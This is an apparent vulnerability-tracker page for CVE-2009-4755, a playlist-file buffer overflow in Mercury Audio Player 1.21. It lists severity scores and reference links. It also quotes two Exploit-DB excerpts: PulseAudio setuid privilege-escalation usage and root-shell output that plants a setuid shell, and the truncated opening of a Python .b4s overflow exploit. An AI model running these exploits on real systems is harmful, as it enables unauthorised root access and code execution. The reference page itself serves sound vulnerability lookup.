CVE-2009-4755
published 2010-03-29CVE-2009-4755: Multiple stack-based buffer overflows in Mercury Audio Player 1.21 allow remote attackers to execute arbitrary code via a long string in a malformed (1) .b4s…
PriorityP351critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.82%
93.2th percentile
Multiple stack-based buffer overflows in Mercury Audio Player 1.21 allow remote attackers to execute arbitrary code via a long string in a malformed (1) .b4s or (2) .pls playlist file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mercuryaudio | audio_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation
exploitdb·2009-07-20
CVE-2009-1894 PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation
PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation
---
PulseAudio setuid Local Privilege Escalation Vulnerability
https://www.securityfocus.com/bid/35721
Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and
Yorick Koster
--
Put files in /tmp/pulseaudio-exp (or change config.h). Must be on
same fs as the pulseaudio binary.
Goes faster if you already have a pulseaudio running ? :p
Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0
(x86)
Ubuntu:
$ ./c.sh
$ ./pulseaudio-exp
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
# id
uid=0(root) gid=0(root)
groups=4(adm),20(dialout),24(cdrom),46(plugdev)
Exploit-DB
Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow
exploitdb·2009-04-30
CVE-2009-4755 Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow
Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow
---
#usage: exploit.py
print "**************************************************************************"
print " Mercury Audio Player 1.21 (.b4s) Local Stack Overflow\n"
print " Refer: http://www.milw0rm.com/exploits/8578"
print " Exploit code: His0k4"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: TO ELITE ALGERIANS,snakespc.com\n"
print "**************************************************************************"
header1 = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x27\x55\x54"
"\x46\x2d\x38\x27\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d"
"\x22\x79\x65\x73\x22\x3f\x3e\x0d\x0a\x3c\x21\x2d\x2d\x20\x54\x68"
"\x65\x20\x74\x61\x67\x20\
No writeups or analysis indexed.
http://osvdb.org/54170http://secunia.com/advisories/34957http://www.exploit-db.com/exploits/8580http://www.exploit-db.com/exploits/8582http://www.securityfocus.com/bid/34788https://exchange.xforce.ibmcloud.com/vulnerabilities/50288http://osvdb.org/54170http://secunia.com/advisories/34957http://www.exploit-db.com/exploits/8580http://www.exploit-db.com/exploits/8582http://www.securityfocus.com/bid/34788https://exchange.xforce.ibmcloud.com/vulnerabilities/50288
2010-03-29
Published